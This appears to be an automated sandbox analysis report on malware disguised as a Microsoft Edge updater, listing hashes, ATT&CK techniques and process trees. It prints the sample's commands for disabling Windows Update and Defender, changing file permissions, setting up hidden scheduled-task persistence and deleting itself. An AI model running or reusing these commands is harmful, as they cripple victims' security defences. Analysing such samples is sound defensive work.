496b8bd286c915005f3c55317df916ec79ad773e7b88e7f52ae7019f2f071ba7

General

Target

MicrosoftEdgeUpdate.exe
Size

4.9MB
MD5

8223e55c97c61478aa4230b2ca498a38
SHA1

a42c6d401fbf798806c5fe85c47cc047c189e486
SHA256

496b8bd286c915005f3c55317df916ec79ad773e7b88e7f52ae7019f2f071ba7
SHA512

5a2f32412d677e22602e0155a70328d9836e06eb26f59b6872b902fd044a7fb1011e066696018ae3db018282169e47e00aea3a861643662746543ab5f4d2f93d
SSDEEP

98304:NKB0rS8yY+gIpexlkt2GguS8qth97fOMFz7lFrL8XE:8BaQgGft2hqeh97fOmXlFk

Score

10^/10

discovery evasion exploit vmprotect

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe

Drops file in Drivers directory 1 IoCs

Processes:

MicrosoftEdgeUpdate.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts MicrosoftEdgeUpdate.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

4220 takeown.exe
928 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	MicrosoftEdgeUpdate.exe

pid	process
4220	takeown.exe
928	icacls.exe

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/2272-132-0x0000000000060000-0x00000000009E4000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MicrosoftEdgeUpdate.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	MicrosoftEdgeUpdate.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

4220 takeown.exe
928 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

10 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

MicrosoftEdgeUpdate.exe

description pid process target process

PID 2272 set thread context of 4792 2272 MicrosoftEdgeUpdate.exe conhost.exe

pid	process
4220	takeown.exe
928	icacls.exe

flow	ioc
10	ip-api.com

description	pid	process	target process
PID 2272 set thread context of 4792	2272	MicrosoftEdgeUpdate.exe	conhost.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

2816 sc.exe
4032 sc.exe
452 sc.exe
540 sc.exe
3616 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

2276 reg.exe
4116 reg.exe
2372 reg.exe
4896 reg.exe
912 reg.exe
4808 reg.exe
2184 reg.exe
1196 reg.exe
4292 reg.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exeMicrosoftEdgeUpdate.exepowershell.exe

pid process

4976 powershell.exe
4976 powershell.exe
2272 MicrosoftEdgeUpdate.exe
1692 powershell.exe
1692 powershell.exe

pid	process
2816	sc.exe
4032	sc.exe
452	sc.exe
540	sc.exe
3616	sc.exe

pid	process
2276	reg.exe
4116	reg.exe
2372	reg.exe
4896	reg.exe
912	reg.exe
4808	reg.exe
2184	reg.exe
1196	reg.exe
4292	reg.exe

pid	process
4976	powershell.exe
4976	powershell.exe
2272	MicrosoftEdgeUpdate.exe
1692	powershell.exe
1692	powershell.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

powershell.exeMicrosoftEdgeUpdate.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4976	powershell.exe
Token: SeDebugPrivilege	2272	MicrosoftEdgeUpdate.exe
Token: SeShutdownPrivilege	532	powercfg.exe
Token: SeCreatePagefilePrivilege	532	powercfg.exe
Token: SeShutdownPrivilege	4016	powercfg.exe
Token: SeCreatePagefilePrivilege	4016	powercfg.exe
Token: SeShutdownPrivilege	3112	powercfg.exe
Token: SeCreatePagefilePrivilege	3112	powercfg.exe
Token: SeShutdownPrivilege	3708	powercfg.exe
Token: SeCreatePagefilePrivilege	3708	powercfg.exe
Token: SeTakeOwnershipPrivilege	4220	takeown.exe
Token: SeDebugPrivilege	1692	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

MicrosoftEdgeUpdate.execmd.execmd.exe

description	pid	process	target process
PID 2272 wrote to memory of 4976	2272	MicrosoftEdgeUpdate.exe	powershell.exe
PID 2272 wrote to memory of 4976	2272	MicrosoftEdgeUpdate.exe	powershell.exe
PID 2272 wrote to memory of 4248	2272	MicrosoftEdgeUpdate.exe	cmd.exe
PID 2272 wrote to memory of 4248	2272	MicrosoftEdgeUpdate.exe	cmd.exe
PID 2272 wrote to memory of 1496	2272	MicrosoftEdgeUpdate.exe	cmd.exe
PID 2272 wrote to memory of 1496	2272	MicrosoftEdgeUpdate.exe	cmd.exe
PID 4248 wrote to memory of 2816	4248	cmd.exe	sc.exe
PID 4248 wrote to memory of 2816	4248	cmd.exe	sc.exe
PID 4248 wrote to memory of 4032	4248	cmd.exe	sc.exe
PID 4248 wrote to memory of 4032	4248	cmd.exe	sc.exe
PID 1496 wrote to memory of 532	1496	cmd.exe	powercfg.exe
PID 1496 wrote to memory of 532	1496	cmd.exe	powercfg.exe
PID 4248 wrote to memory of 452	4248	cmd.exe	sc.exe
PID 4248 wrote to memory of 452	4248	cmd.exe	sc.exe
PID 1496 wrote to memory of 4016	1496	cmd.exe	powercfg.exe
PID 1496 wrote to memory of 4016	1496	cmd.exe	powercfg.exe
PID 4248 wrote to memory of 540	4248	cmd.exe	sc.exe
PID 4248 wrote to memory of 540	4248	cmd.exe	sc.exe
PID 1496 wrote to memory of 3112	1496	cmd.exe	powercfg.exe
PID 1496 wrote to memory of 3112	1496	cmd.exe	powercfg.exe
PID 4248 wrote to memory of 3616	4248	cmd.exe	sc.exe
PID 4248 wrote to memory of 3616	4248	cmd.exe	sc.exe
PID 1496 wrote to memory of 3708	1496	cmd.exe	powercfg.exe
PID 1496 wrote to memory of 3708	1496	cmd.exe	powercfg.exe
PID 4248 wrote to memory of 2276	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 2276	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 4808	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 4808	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 2184	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 2184	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 1196	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 1196	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 4292	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 4292	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 4220	4248	cmd.exe	takeown.exe
PID 4248 wrote to memory of 4220	4248	cmd.exe	takeown.exe
PID 4248 wrote to memory of 928	4248	cmd.exe	icacls.exe
PID 4248 wrote to memory of 928	4248	cmd.exe	icacls.exe
PID 4248 wrote to memory of 4116	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 4116	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 2372	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 2372	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 4896	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 4896	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 912	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 912	4248	cmd.exe	reg.exe
PID 4248 wrote to memory of 2216	4248	cmd.exe	schtasks.exe
PID 4248 wrote to memory of 2216	4248	cmd.exe	schtasks.exe
PID 4248 wrote to memory of 4820	4248	cmd.exe	schtasks.exe
PID 4248 wrote to memory of 4820	4248	cmd.exe	schtasks.exe
PID 4248 wrote to memory of 1504	4248	cmd.exe	schtasks.exe
PID 4248 wrote to memory of 1504	4248	cmd.exe	schtasks.exe
PID 4248 wrote to memory of 3716	4248	cmd.exe	schtasks.exe
PID 4248 wrote to memory of 3716	4248	cmd.exe	schtasks.exe
PID 4248 wrote to memory of 4940	4248	cmd.exe	schtasks.exe
PID 4248 wrote to memory of 4940	4248	cmd.exe	schtasks.exe
PID 4248 wrote to memory of 1140	4248	cmd.exe	schtasks.exe
PID 4248 wrote to memory of 1140	4248	cmd.exe	schtasks.exe
PID 4248 wrote to memory of 3592	4248	cmd.exe	schtasks.exe
PID 4248 wrote to memory of 3592	4248	cmd.exe	schtasks.exe
PID 2272 wrote to memory of 4792	2272	MicrosoftEdgeUpdate.exe	conhost.exe
PID 2272 wrote to memory of 4792	2272	MicrosoftEdgeUpdate.exe	conhost.exe
PID 2272 wrote to memory of 4792	2272	MicrosoftEdgeUpdate.exe	conhost.exe
PID 2272 wrote to memory of 4792	2272	MicrosoftEdgeUpdate.exe	conhost.exe

C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeUpdate.exe"
1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAZABjAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAaQB5ACMAPgA="
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4976

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
- Suspicious use of WriteProcessMemory
PID:4248

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:2816

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:4032

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:452

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:540

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:3616

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:2276

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:4808

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies security service
- Modifies registry key
PID:2184

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:1196

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:4292

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4220

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:928

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4116

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:2372

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4896

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:912

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:2216

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:4820

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:1504

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:3716

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:4940

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:1140

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:3592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1496

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:532

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4016

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3112

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3708

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
- Drops file in Windows directory
PID:4792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAdAAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBIAG8AQQBiAHcAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBOAEEARwBrAEEAWQB3AEIAeQBBAEcAOABBAGMAdwBCAHYAQQBHAFkAQQBkAEEAQgBjAEEARQBVAEEAWgBBAEIAbgBBAEcAVQBBAFYAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEUAVQBBAFoAQQBCAG4AQQBHAFUAQQBWAFEAQgB3AEEARwBRAEEAWQBRAEIAMABBAEcAVQBBAEwAZwBCAGwAQQBIAGcAQQBaAFEAQQBuAEEAQwBBAEEATABRAEIAVwBBAEcAVQBBAGMAZwBCAGkAQQBDAEEAQQBVAGcAQgAxAEEARwA0AEEAUQBRAEIAegBBAEMAQQBBAFAAQQBBAGoAQQBHAGcAQQBaAFEAQQBqAEEARAA0AEEAIgAnACkAIAA8ACMAdQBtAGQAbAAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAGoAYQBnACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAbwB1AHgAYgAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcATQBpAGMAcgBvAHMAbwBmAHQAIABFAGQAZwBlACAAVQBwAGQAYQB0AGUAIAAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGUAbwAjAD4AOwAgAEMAbwBwAHkALQBJAHQAZQBtACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAE0AaQBjAHIAbwBzAG8AZgB0AEUAZABnAGUAVQBwAGQAYQB0AGUALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEUAZABnAGUAVQBwAGQAYQB0AGUAcgBcAE0AaQBjAHIAbwBzAG8AZgB0AEUAZABnAGUAVQBwAGQAYQB0AGUALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAbwBrAGgAcwAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAdwB3AGUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAgAFUAcABkAGEAdABlACAAJwA7AA=="
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeUpdate.exe"
2⤵
PID:1424

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:1672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:2508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:3092

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{5ef4d8bd-ce93-4d6f-8e36-7cbacd175ae2}
1⤵
PID:3768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHoAbwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEUAZABnAGUAVQBwAGQAYQB0AGUAcgBcAE0AaQBjAHIAbwBzAG8AZgB0AEUAZABnAGUAVQBwAGQAYQB0AGUALgBlAHgAZQAnACAALQBWAGUAcgBiACAAUgB1AG4AQQBzACAAPAAjAGgAZQAjAD4A"
1⤵
PID:1004

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
memory/452-146-0x0000000000000000-mapping.dmp

Download
memory/532-145-0x0000000000000000-mapping.dmp

Download
memory/540-148-0x0000000000000000-mapping.dmp

Download
memory/912-162-0x0000000000000000-mapping.dmp

Download
memory/928-158-0x0000000000000000-mapping.dmp

Download
memory/1140-168-0x0000000000000000-mapping.dmp

Download
memory/1196-155-0x0000000000000000-mapping.dmp

Download
memory/1424-196-0x0000000000000000-mapping.dmp

Download
memory/1496-141-0x0000000000000000-mapping.dmp

Download
memory/1504-165-0x0000000000000000-mapping.dmp

Download
memory/1672-197-0x0000000000000000-mapping.dmp

Download
memory/1692-194-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp

Filesize
10.8MB

Download
memory/1692-178-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp

Filesize
10.8MB

Download
memory/1692-175-0x0000000000000000-mapping.dmp

Download
memory/2184-154-0x0000000000000000-mapping.dmp

Download
memory/2216-163-0x0000000000000000-mapping.dmp

Download
memory/2272-139-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp

Filesize
10.8MB

Download
memory/2272-198-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp

Filesize
10.8MB

Download
memory/2272-144-0x000000001D460000-0x000000001D472000-memory.dmp

Filesize
72KB

Download
memory/2272-132-0x0000000000060000-0x00000000009E4000-memory.dmp

Filesize
9.5MB

Download
memory/2272-133-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp

Filesize
10.8MB

Download
memory/2276-152-0x0000000000000000-mapping.dmp

Download
memory/2372-160-0x0000000000000000-mapping.dmp

